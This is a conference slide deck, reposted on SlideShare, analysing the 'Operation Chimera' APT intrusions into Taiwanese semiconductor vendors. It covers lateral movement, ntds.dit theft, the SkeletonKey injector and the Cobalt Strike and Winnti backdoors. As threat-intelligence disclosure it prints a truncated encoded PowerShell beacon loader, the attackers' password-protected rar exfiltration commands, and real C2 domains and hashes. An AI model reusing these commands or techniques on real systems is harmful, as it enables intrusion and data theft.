SlideShare uma empresa Scribd logo
1 de 72
Baixar para ler offline
CyCraft Proprietary and Confidential Information
Operation Chimera - APT Operation
Targets Semiconductor Vendors
C h u n g - K u a n C h e n , I n n d y L i n , S h a n g - D e J i a n g
CyCraft Proprietary and Confidential Information
Whoami C.K Chen
► Senior Researcher at CyCraft
► Retired CTF Player – BambooFox Founder
► HITCON/HITB Review Board
► CHROOT member
SHANG-DE Jiang
► Security Researcher at CyCraft
► UCCU Hacker Co-Founder
Inndy Lin
► Security Researcher at CyCraft
► Reverse Engineering Hobbyist
► Presented in HITCON, ROOTCON
CyCraft
CyCraft is an AI company that forges the future of
cybersecurity resilience through autonomous systems and
human-AI collaboration.
CyCraft in MITRE ATT&CK Evaluation
CyCraft Takes Significant Alerting Lead in
MITRE ATT&CK® Evaluations’ Latest Round
Outline
• Introduction
• Case Study
• A Company
• B Company
• C Company
• Threat Actor's Digital Arsenal
• Conclusion
CyCraft Proprietary and Confidential Information
Critical Incidents in Taiwan's Supply
Chain/Critical Infrastructure
ASUS Supply Chain AttackTSMC Ransomware ColdLock against CPC
CyCraft Proprietary and Confidential Information
Taiwan's Importance in the
Semiconductor Landscape
►With decades of development, Taiwan has established itself as a leading player in the
semiconductor industry. Some of the well-known leaders include TSMC and MTK
• “Taiwan is set to become the largest and fastest-growing semiconductor
equipment maker in the world by increasing by 21.1 percent to reach
US$12.31 billion.” -Taiwan News, July 2019
Cyberattack to semiconductor vendors
v Just like the TSMC ransomware, a cyberattack against semiconductor could
potentially
v Seriously impact Taiwan’s economy
v Affect the entire global supply chain
v In this report, we will show how IT attacks on semiconductor vendors can be just as
dangerous as an OT attack.
v Attack to OT - production line halt, immediately damage
v Attack to IT - leak important intelligence property, long-term damage
Large-scale APT attacks on
Semiconductor Industry
Between 2018 and 2019, we discovered several attacks on semiconductor vendors
Vendors located at the Hsinchu Science Park(HSP) were targeted
After our white paper was published, the received feedback revealed that more than 8
vendors were targeted by the same threat actor (New victim found after our sharing in BH)
Extensive attack: > 8 semiconductor vendors were attacked
The APT on the important vendors were precise and well-coordinated.
Their subsidiaries, and competitors were all targeted
Not a single point attack, but an attack on the entire industry
surface
CyCraft Proprietary and Confidential Information
Group Chimera
►As the activities, attack techniques,
and tactics were similar, we believe
this was the work of the same threat
actor
►Target: Semiconductor Vendors
►Malware: Merged different Open
Source Tools (Dumpert and
Mimikatz , CobaltStrike)
►C2: C2 hosted in Public Cloud
(Google App Engine, Azure)
►Goal: Steal Documents, Source code,
SDK of chip related projects
Investigation Overview
Investigation Period:
2018~2019
Investigated Vendors:
3+
Total Endpoints Analyzed:
30k
Today's Case Study
Ø The three vendors involved in the analysis currently have a leading global
position in their own market segments
Ø Due to the different investigation time points, the analytical perspective of
the attack campaign was different
A Company
• Our long-term partner. The long-
term monitoring allowed more
details of the attacker's activities
to be revealed.
• The detailed information enabled
us to track the root cause.
B Company
• One-time IR service. When the
investigation started, it was
already a long time after the
attacks happened.
• Highlighted the threat actor’s
long-term activities and what data
was leaked.
C Company
• Long-term partner with high
security capacity.
• Help us to deep investigate, get a
lot feedback from them
• Give us more information to
illustrate threat actors
Non-representative. Only for illustration purposes
In the following slides, every machine and username are de-identified,
not original names
A Company
Case A: Overview
Ø Activity date: 2019/12/09 ~ 2019/12/10
Ø 15 endpoints and 6 user accounts
were compromised
Ø Note that all the names are de-identified
Ø Four malwares and eight C2 servers
were found
Cobalt Strike
Ø Disguised Cobalt Strike beacon as Google Update.exe
Ø VT search found nothing
Ø Injected payloads into other processes
Ø Found in two endpoints: Server-LAUREN & PC-SHENNA
Used Hosting Server for C2
Ø Network security devices had difficulty detecting the associated C2 servers, as they
were in the Google Cloud Platform.
• Created backdoor which was disguised as Google Update.
• Other cloud hosting services were also abused
Root Cause Analysis - PC-SHENNA
Ø With our Timeline Analysis, we found that the backdoor in PC-SHENNA was
implanted from Server-LAUREN
Server-
LAUREN
PC-
SHENNA
Attack was launched right before
employees began to get off work
Remote Execution Tools
schtasks
Ø The first Cobalt Strike backdoor was
located at NB-CLAIR, and was then
remotely copied to Server-LAUREN
Ø A valid account was used to invoke
Cobalt Strike via schtasks
WMIC
Ø Server-LAUREN used wmic to
remotely execute various commands
in another endpoint to check if there
was an Internet connection
Applied benign program to achieve their malicious activities
Root Cause Analysis - Server-LAUREN
Ø Due to our new findings, additional information could be added to our
investigation graph
Server-
MELINA
Server-
SHANAE
Server-
LAUREN
PC-SHENNA
Root Cause Analysis - Server-LAUREN
Ø Server-LAUREN remotely used an archive tool to collect registry and ntds.dit in
Server-MELINA(DC) for offline breaking
NTDS.DIT Explanation
Ø Active Directory data was stored in the ntds.dit ESE database file. Two copies of
ntds.dit were present in separate locations on a given domain controller.
• %SystemRoot%NTDSntds.dit
• %SystemRoot%System32ntds.dit
ntds.dit is the AD database, containing domain hosts and users information(e.g. ID,
name, email and password). As ntds.dit was encrypted, and the key was stored I the
SYSTEM registry, the adversary also needed to make a copy of the registry data.
Root Cause Analysis - NB-CLAIR
Ø Through correlation analysis, our AI investigation showed
that NB-CLAIR used Schedule Task to place malware to the
schedule tasks of Server-LAUREN
Server-
MELINA
Server-
SHANAE
Server-
LAUREN
PC-
SHENNA
schtasks
wmic
schtasks
NB-CLAIR
schtasks
Root Cause Analysis - NB-CLAIR
Ø In the NB-CLAIR timeline, we discovered six minutes before the scheduled task
execution, IP1 used RDP and User-01 to make a successful login
• This is highly likely to be the root cause of the attack
Nightshift? Overtime?
Recon
Ø Several "net user" commands were executed for
recon purposes, and the results were saved to the
RecordedTV_lib.log
Data Exfiltration
Ø RECORDEDTV.MS was used to archive the stolen data for data exfiltration
• Identical binaries were found in several machines, but under different names, e.g.
RECORDEDTV.MS, uncheck.dmp, and jucheck.exe
• RAR software, had a one-byte discrepancy from the original version
Ø The same file was also found on other machines. Thus, it is likely to have been used
in past attacks
Ø Inserting malware in a location, where legal software is stored, seems to be a
characteristic tactic of Operation Chimera
Root Cause Analysis– IP1
Ø IP1 is a unscanned host and related to many accounts. It could be a shared
machine or a VPN host
Ø VPN can also be compromised. Never use VPN as your only line of defense
B Company
• Investigation Reason
• Statistic Summary
B Company : Overview
B company
compromise
B has business
cooperation
with C
company
B&C create a
bridge between
their networks
C discovers
anomaly
activities from
B
Asks us to
investigate
Time Period # of Event # of compromised endpoints # of data leaks # of malware
2018/8/7 ~ 2019/12/11 140k+ 14 9 10
Powershell
Ø Fileless
• 10 endpoints, which included two
domain controllers
Ø The powershell script executed a
Cobalt Strike backdoor and was used
for process migration to other system
processes svchost.exe
powershell -nop -w hidden -encodedcommand
JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwB
uAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAE
EAQQBBAEEAQQBLAFYAVwBiAFcALwBpAE8AQgBEACsAMwBQAHcASwBYADQAVgAwAG8ASgBaADMAdABnAHQAZABWAFYAb
wBuAFEAQQBrAGwAbABKAGMAVwAyAGsAWABWAHkAUwBRAG0AdQBEAGcASgBkAFoAeQBtAGQATABmAC8ALwBTAFkAdgA1
AEoAYgAyAGIAawArADYAaQB4AFEAbABuAHMAdwA4AE0AOAA5ADQAUABKAE0AcABsAGMAVwBwAEYATQB5AFUAaABtAGQ
AUgBWAEoAeABSADQAVABQ
APT Attack
Ø Cobalt Strike was used to inject the malware into
the system, enabling the attacker to access the
system and communicate with a C2
• C2: striking-pipe-253603.appspot.com,
msplatform-updates.azureedge.net, chrome-
applatses.appspot.com
Cyber Situation Graph
Ø Company already seriously hacked
Ø Difficult to manually investigate, needed help from A.I.
❖2018.11
❖2019.03
❖2019.06
❖2019.09
Hacker returns on a
quarterly basis to
collect new data.
❖2019.11, Deploy new weapon SkeletonKey Injector
❖2019.12, Harvest new endpoints
Archive Password
Ø The actor also used a RAR program
with innocuous file names, such as
RecordedTV.ms, jucheck.exe
and vmware.log to archive and steal
the data of interest
Ø A similar scheme was utilized by the
attacker to archive the passwords they
used
c:usersxxxxlibrariesRecordedTV.ms a -m5 -
v71m –hpf**kyou.google.com11 vmlum-vss.log
vmlum-vmvss.log
C:Windowssystem32cmd.exe /C
c:usersxxxxxxlibrariesRecordedTV.ms a -m5 -r
–hpf**kyou.google.com11 vmlum-vmopt.log
“<Hostname>personal<Username><Product>-
Traning-v1.1.pptx" > vmlumss.log & dir vmlum-
vmopt*
Leaked File Name
Ø During our investigation, we made an inventory of the leaked data. Some of the
data is shown below:
Ø Attacker's intent was stealing intelligence property
Ø Business spy? State-sponsor attack to benefit a certain industry?
Users<Account>ProjectRoadmap
Users<Account>BackupWorkspace
Users<Account>chip and SDK setting
Users<Account><Productname> SDK
Installation guide.pdf
C Company
Utilize Cloud Storage
Ø Exfiltration Tool: 3 in 1 Cloud-Storage Tool (GDrive, Dropbox, OneDrive)
Ø MD5:
ØV1: be16e6cf8cc63415a1c77a59fa43deba (no record in VT)
ØV2: 4d5440282b69453f4eb6232a1689dd4a (onedrive.exe)
Ø Use Cloud-based Storage Web API to transfer file -> able to bypass L7 firewall
Ø Exfiltration Tool: another Cloud-Storage Tool (Openload Free Space)
Ø C# Program
3 in 1 Cloud-based Storage Transfer
Tool
Storage
Type
auth Token Uploaded File Path
Profile of the Campaign
Ø Language - Simplified Chinese
Profile of the Campaign
v Language - Simplified Chinese Chimera Campaign has at least one member understanding Chinese
Profile of the Campaign
v Hacker Active Timeline(2019) v Working hours
v 8:30 - 12:30 to 13:30 – 20:30 (UTC +8)
v Working days
v Mon. ~ Fri. ß Normal Time
v Wed. ß most busy
v Sat. ß Event Driven overtime
The campapaign is at the same timezone to TW (UTC+8)
Actors' Digital Arsenal
CyCraft Proprietary and Confidential Information
Actors' Digital Arsenal
►Cobalt Strike Beacon
►WinRAR
►SkeletonKey Injector
►Winnti Backdoor
►CCleaner Attack Stage2 Backdoor
Cobalt Strike Beacon
CyCraft Proprietary and Confidential Information
Cobalt Strike Beacon
►Cobalt Strike Beacon was used as main backdoor
►Overwrite GoogleUpdate.exe for persistency
►Identical file was discovered in 3+ companies
►C2
► chrome-applatnohp.appspot.com
► ussdns04.heketwe.com
► ussdns02.heketwe.com
► ussdns01.heketwe.com
CyCraft Proprietary and Confidential Information
Suspicious R-W-X Memory
►Our product detected shellcode in memory
CyCraft Proprietary and Confidential Information
Hybrid Payload: PE as Shellcode
►"MZ" signature can be decoded as "pop r10" under x64 architecture
►"dec ebp; pop edx" under x86 architecture
►At offset 0x1791c is a shellcode-like function called "reflective loader"
►0x56A2B5F0 is the hash value of "ExitProcess"
Locate address of itself, and use it as first argument (rdi)
Compuate address of reflective loader and execute it
CyCraft Proprietary and Confidential Information
Malicious Process
Injection Strategy: Named Pipe
CobaltStrike
Beacon Module
Target Process
Stager Shellcode Real Payload
Execute
Spawn
Inject
Execute
Named Pipe
WinRAR
CyCraft Proprietary and Confidential Information
WinRAR
►They use rar.exe to compress and encrypt the files to be stole
►There's a folder named "RecordedTV.library-ms" under same path
CyCraft Proprietary and Confidential Information
Mutated rar.exe
►The file was uploaded to VirusTotal in 2009
►It's rar.exe from WinRAR 3.60b8 but different from original one
►Only 1byte was different, but we've confirmed that was not a crack
►This patch may cause the program crash
►Hypothesis 1: Change file hash to avoid detection
►Hypothesis 2: Bit flip during copy
Patch diff (before / after) Disassembly of patch
SkeletonKey Injector
CyCraft Proprietary and Confidential Information
SkeletonKey Injector
►A new malware combined "dumpert" and "mimikatz"
►"mimikatz" is a well-known hacking tool
►"dumpert" is a tool to dump lsass.exe memory stealthily
CyCraft Proprietary and Confidential Information
Dumpert
►Made by a security company called Outflank
►Dump lsass.exe stealthy via direct system call
►Difficulty of direct system call on Windows
►Windows system call numbers changed from release to release
►DLL export function is the only stable interface
►That's why Windows shellcode always needs to locate DLLs in memory
CyCraft Proprietary and Confidential Information
Dumpert: Implementation
►Use ntdll!RtlGetVerion to determine Windows version
►Load different embedded syscall functions depend on Windows version
►Bypass any userspace hook
CyCraft Proprietary and Confidential Information
SkeletonKey
►APT malware discovered by DELL Secureworks in 2015
►Implants a backdoor password to domain controller
►The original password was still valid, wrong password still got rejected
►Inject code into lsass.exe process to alter authentication routine
CyCraft Proprietary and Confidential Information
Impact of SkeletonKey Injector
►No need to use administrator credentials for lateral movement
►It leaves nearly no clue, only logon success events
►You must reboot domain controller to clean the SkeletonKey
►We've observed some other attack that using modified mimikatz in Taiwan
Winnti Backdoor
CyCraft Proprietary and Confidential Information
Strange Network Tool: baseClient.exe
►We thought that was a network probing tool
CyCraft Proprietary and Confidential Information
Winnti Backdoor
►We said baseClient.exe was a network probing tool in our public report
►It's actually Winnti backdoor
Backdoor Used in
CCleaner Attack
CyCraft Proprietary and Confidential Information
CCleaner Supply Chain Attack
Injected Malware
Implant second stage backdoor to
the chosen victim
Trojanized DLL
Malicious Code
Second Stage MalwareFirst Stage Malware
We found a variant of 2nd stage
malware in the last investigation
CyCraft Proprietary and Confidential Information
Backdoor Used in CCleaner Attack
►After BlackHat presentation, we discovered a new victim of Chimera Group
►We found a variant of malware used in CCleaner Attack
►filename: wlbsctrl.dll
►md5: 6376a3469c9fb1bb8326e7af734e01d1
►filename: wlbsctrl.dll.mui
►md5: ( we will release more information soon, follow @cycraft_corp )
CyCraft Proprietary and Confidential Information
Backdoor Execution Flow
Re-assemble
wlbsctrl.dll
(VMicApi.dll)
Shellcode Collector
Modified C Runtime
Execute
Shellcode pieces
spread in the DLL
wlbsctrl.dll.mui
Read and execute shellcode
from $DLLNAME.mui
Obfuscated, Compressed ShellcodeEmbedded PE
Filelessly Execute Include
CyCraft Proprietary and Confidential Information
Comparison of the Malware
This Malware CCleaner Malware
Trojanize Patch
Modify __security_init_cookie
Patch call to GetSystemTimeAsFileTime Patch function tail
Overwrite init function pointer ( which will be executed before DllMain/main )
Read payload from $DLLPATH.mui Read payload from registry
Shellcode Decode, decompress and sRDI-liked PE loader
Obtain C&C IP Hardcoded C2 IP, DWORD in Registry, GitHub GitHub, WordPress, DNS Query
Capability Fileless PE execution, Replace file, WinExec Fileless PE execution
Other APT Events in Taiwan
CyCraft Proprietary and Confidential Information
ColdLock Ransomware
►Taiwan's national gasoline company was hit by ransomware
►ColdLock was based on an open-source ransomware: EDA2
►Ministry of Justice Investigation Bureau said the attack was related to Winnti group
CyCraft Proprietary and Confidential Information
SkeletonKey Attack in Taiwan
►Serval attacks against Taiwan government agencies used mimikatz and SkeletonKey
►They use modified version of mimikatz and executed file-lessly
When OpenProcess failed, it will load mimikatz driver to unprotect lsass.exe and try again.
CyCraft Proprietary and Confidential Information
Take Away
►Disclosure a large-scale APT attacks targeting semiconductor; more
than 7 vendors are compromised.
►Precisely attacks. Targets leading semiconductor vendors, their
subsidiaries, partners and competitors.
►Their goals is stealing intelligence property(documents, source code,
SDK of chip related projects). Make long-term damage to the victim.
CyCraft Proprietary and Confidential Information
Take Away
►Attackers utilize varies open source, general tools to make attribution
harder.
►In 2 shared case studies, AD & VPN are compromised. Enterprises
should consider resilience of IT systems. Avoid relying on a single
security service.
►A rarely used SkeletonKey technique is used, which makes
adversaries login like normal user. - Persistence, Defense Evasion.
►No system is safe. Regularly threat hunting,
shorten the MTTD/MTTR.
Thanks for your listening!

Mais conteúdo relacionado

Mais procurados

Mais procurados (20)

No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016
 
ATT&CK is the Best Defense - Emulating Sophisticated Adversary Malware to Bol...
ATT&CK is the Best Defense - Emulating Sophisticated Adversary Malware to Bol...ATT&CK is the Best Defense - Emulating Sophisticated Adversary Malware to Bol...
ATT&CK is the Best Defense - Emulating Sophisticated Adversary Malware to Bol...
 
Cyber Threat Intelligence
Cyber Threat IntelligenceCyber Threat Intelligence
Cyber Threat Intelligence
 
ATTACKers Think in Graphs: Building Graphs for Threat Intelligence
ATTACKers Think in Graphs: Building Graphs for Threat IntelligenceATTACKers Think in Graphs: Building Graphs for Threat Intelligence
ATTACKers Think in Graphs: Building Graphs for Threat Intelligence
 
Workshop Trend Micro
Workshop Trend MicroWorkshop Trend Micro
Workshop Trend Micro
 
Windows Threat Hunting
Windows Threat HuntingWindows Threat Hunting
Windows Threat Hunting
 
SOC, Amore Mio! | Security Webinar
SOC, Amore Mio! | Security WebinarSOC, Amore Mio! | Security Webinar
SOC, Amore Mio! | Security Webinar
 
State of the ATT&CK
State of the ATT&CKState of the ATT&CK
State of the ATT&CK
 
Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...
Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...
Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...
 
ATT&CK Updates- ATT&CK for ICS
ATT&CK Updates- ATT&CK for ICSATT&CK Updates- ATT&CK for ICS
ATT&CK Updates- ATT&CK for ICS
 
Threat Intelligence & Threat research Sources
Threat Intelligence & Threat research SourcesThreat Intelligence & Threat research Sources
Threat Intelligence & Threat research Sources
 
Red Team Framework
Red Team FrameworkRed Team Framework
Red Team Framework
 
Taking the Attacker Eviction Red Pill (v2.0)
Taking the Attacker Eviction Red Pill (v2.0)Taking the Attacker Eviction Red Pill (v2.0)
Taking the Attacker Eviction Red Pill (v2.0)
 
Threat Modelling - It's not just for developers
Threat Modelling - It's not just for developersThreat Modelling - It's not just for developers
Threat Modelling - It's not just for developers
 
ATT&CK Updates- Campaigns
ATT&CK Updates- CampaignsATT&CK Updates- Campaigns
ATT&CK Updates- Campaigns
 
State of the ATTACK
State of the ATTACKState of the ATTACK
State of the ATTACK
 
Honeypots
HoneypotsHoneypots
Honeypots
 
PHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On LabPHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On Lab
 
[CB21] MUSHIKAGO: IT and OT Automation Penetration testing Tool Using Game AI...
[CB21] MUSHIKAGO: IT and OT Automation Penetration testing Tool Using Game AI...[CB21] MUSHIKAGO: IT and OT Automation Penetration testing Tool Using Game AI...
[CB21] MUSHIKAGO: IT and OT Automation Penetration testing Tool Using Game AI...
 
Role of Forensic Triage In Cyber Security Trends 2021
Role of Forensic Triage In Cyber Security Trends 2021Role of Forensic Triage In Cyber Security Trends 2021
Role of Forensic Triage In Cyber Security Trends 2021
 

Semelhante a [CB20] Operation Chimera - APT Operation Targets Semiconductor Vendors by CK Chen, Inndy Lin, Shan-De Jiang

Ce hv8 module 17 evading ids, firewalls, and honeypots
Ce hv8 module 17 evading ids, firewalls, and honeypotsCe hv8 module 17 evading ids, firewalls, and honeypots
Ce hv8 module 17 evading ids, firewalls, and honeypots
Mehrdad Jingoism
 
Ce hv8 module 04 enumeration
Ce hv8 module 04 enumerationCe hv8 module 04 enumeration
Ce hv8 module 04 enumeration
Mehrdad Jingoism
 
NXP'S-PORTFOLIO-FOR-ADDRESSING-IOT-SECURITY.pdf
NXP'S-PORTFOLIO-FOR-ADDRESSING-IOT-SECURITY.pdfNXP'S-PORTFOLIO-FOR-ADDRESSING-IOT-SECURITY.pdf
NXP'S-PORTFOLIO-FOR-ADDRESSING-IOT-SECURITY.pdf
ssuser57b3e5
 

Semelhante a [CB20] Operation Chimera - APT Operation Targets Semiconductor Vendors by CK Chen, Inndy Lin, Shan-De Jiang (20)

Brian Isle: The Internet of Things: Manufacturing Panacea - or - Hacker's Dream?
Brian Isle: The Internet of Things: Manufacturing Panacea - or - Hacker's Dream?Brian Isle: The Internet of Things: Manufacturing Panacea - or - Hacker's Dream?
Brian Isle: The Internet of Things: Manufacturing Panacea - or - Hacker's Dream?
 
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemy
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemyRooted2020 stefano maccaglia--_the_enemy_of_my_enemy
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemy
 
MITRE ATT&CKcon 2.0: Zeek-based ATT&CK Metrics and Gap Analysis; Allan Thomso...
MITRE ATT&CKcon 2.0: Zeek-based ATT&CK Metrics and Gap Analysis; Allan Thomso...MITRE ATT&CKcon 2.0: Zeek-based ATT&CK Metrics and Gap Analysis; Allan Thomso...
MITRE ATT&CKcon 2.0: Zeek-based ATT&CK Metrics and Gap Analysis; Allan Thomso...
 
Ce hv8 module 17 evading ids, firewalls, and honeypots
Ce hv8 module 17 evading ids, firewalls, and honeypotsCe hv8 module 17 evading ids, firewalls, and honeypots
Ce hv8 module 17 evading ids, firewalls, and honeypots
 
Needlesand haystacks i360-dublin
Needlesand haystacks i360-dublinNeedlesand haystacks i360-dublin
Needlesand haystacks i360-dublin
 
Year of pawnage - Ian trump
Year of pawnage  - Ian trumpYear of pawnage  - Ian trump
Year of pawnage - Ian trump
 
Penetration Testing as an auditing tool
Penetration Testing as an auditing toolPenetration Testing as an auditing tool
Penetration Testing as an auditing tool
 
BSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status Quo
BSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status QuoBSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status Quo
BSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status Quo
 
【HITCON FreeTalk 2021 - SolarWinds 供應鏈攻擊事件分析】
【HITCON FreeTalk 2021 -  SolarWinds 供應鏈攻擊事件分析】【HITCON FreeTalk 2021 -  SolarWinds 供應鏈攻擊事件分析】
【HITCON FreeTalk 2021 - SolarWinds 供應鏈攻擊事件分析】
 
CONFidence2015: Real World Threat Hunting - Martin Nystrom
CONFidence2015: Real World Threat Hunting - Martin NystromCONFidence2015: Real World Threat Hunting - Martin Nystrom
CONFidence2015: Real World Threat Hunting - Martin Nystrom
 
Disruptionware-TRustedCISO103020v0.7.pptx
Disruptionware-TRustedCISO103020v0.7.pptxDisruptionware-TRustedCISO103020v0.7.pptx
Disruptionware-TRustedCISO103020v0.7.pptx
 
4 Cyber Security KPIs
4 Cyber Security KPIs4 Cyber Security KPIs
4 Cyber Security KPIs
 
Cybersecurity - Jim Butterworth
Cybersecurity - Jim ButterworthCybersecurity - Jim Butterworth
Cybersecurity - Jim Butterworth
 
Beyond S3 Buckets - Effective Countermeasures for Emerging Cloud Threats
Beyond S3 Buckets - Effective Countermeasures for Emerging Cloud ThreatsBeyond S3 Buckets - Effective Countermeasures for Emerging Cloud Threats
Beyond S3 Buckets - Effective Countermeasures for Emerging Cloud Threats
 
JAKU Botnet Analysis
JAKU Botnet AnalysisJAKU Botnet Analysis
JAKU Botnet Analysis
 
A modern approach to safeguarding your ICS and SCADA systems
A modern approach to safeguarding your ICS and SCADA systemsA modern approach to safeguarding your ICS and SCADA systems
A modern approach to safeguarding your ICS and SCADA systems
 
Fighting cyber fraud with hadoop v2
Fighting cyber fraud with hadoop v2Fighting cyber fraud with hadoop v2
Fighting cyber fraud with hadoop v2
 
Ce hv8 module 04 enumeration
Ce hv8 module 04 enumerationCe hv8 module 04 enumeration
Ce hv8 module 04 enumeration
 
NXP'S-PORTFOLIO-FOR-ADDRESSING-IOT-SECURITY.pdf
NXP'S-PORTFOLIO-FOR-ADDRESSING-IOT-SECURITY.pdfNXP'S-PORTFOLIO-FOR-ADDRESSING-IOT-SECURITY.pdf
NXP'S-PORTFOLIO-FOR-ADDRESSING-IOT-SECURITY.pdf
 
CLÍNICA DE RESPUESTAS A INCIDENTES Y THREAT HUNTING - WORKSHOP DAY TÉCNICO DE...
CLÍNICA DE RESPUESTAS A INCIDENTES Y THREAT HUNTING - WORKSHOP DAY TÉCNICO DE...CLÍNICA DE RESPUESTAS A INCIDENTES Y THREAT HUNTING - WORKSHOP DAY TÉCNICO DE...
CLÍNICA DE RESPUESTAS A INCIDENTES Y THREAT HUNTING - WORKSHOP DAY TÉCNICO DE...
 

Mais de CODE BLUE

[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
CODE BLUE
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之
CODE BLUE
 
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
CODE BLUE
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo
CODE BLUE
 
[cb22] ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...
[cb22]  ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...[cb22]  ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...
[cb22] ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...
CODE BLUE
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman
[cb22]  「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman [cb22]  「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman
CODE BLUE
 
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
CODE BLUE
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by 高橋 郁夫
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by  高橋 郁夫[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by  高橋 郁夫
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by 高橋 郁夫
CODE BLUE
 
[cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka
[cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka [cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka
[cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka
CODE BLUE
 
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...
CODE BLUE
 
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...
CODE BLUE
 
[cb22] From Parroting to Echoing: The Evolution of China’s Bots-Driven Info...
[cb22]  From Parroting to Echoing:  The Evolution of China’s Bots-Driven Info...[cb22]  From Parroting to Echoing:  The Evolution of China’s Bots-Driven Info...
[cb22] From Parroting to Echoing: The Evolution of China’s Bots-Driven Info...
CODE BLUE
 
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...
CODE BLUE
 
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
CODE BLUE
 

Mais de CODE BLUE (20)

[cb22] Hayabusa Threat Hunting and Fast Forensics in Windows environments fo...
[cb22] Hayabusa  Threat Hunting and Fast Forensics in Windows environments fo...[cb22] Hayabusa  Threat Hunting and Fast Forensics in Windows environments fo...
[cb22] Hayabusa Threat Hunting and Fast Forensics in Windows environments fo...
 
[cb22] Tales of 5G hacking by Karsten Nohl
[cb22] Tales of 5G hacking by Karsten Nohl[cb22] Tales of 5G hacking by Karsten Nohl
[cb22] Tales of 5G hacking by Karsten Nohl
 
[cb22] Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...
[cb22]  Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...[cb22]  Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...
[cb22] Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...
 
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
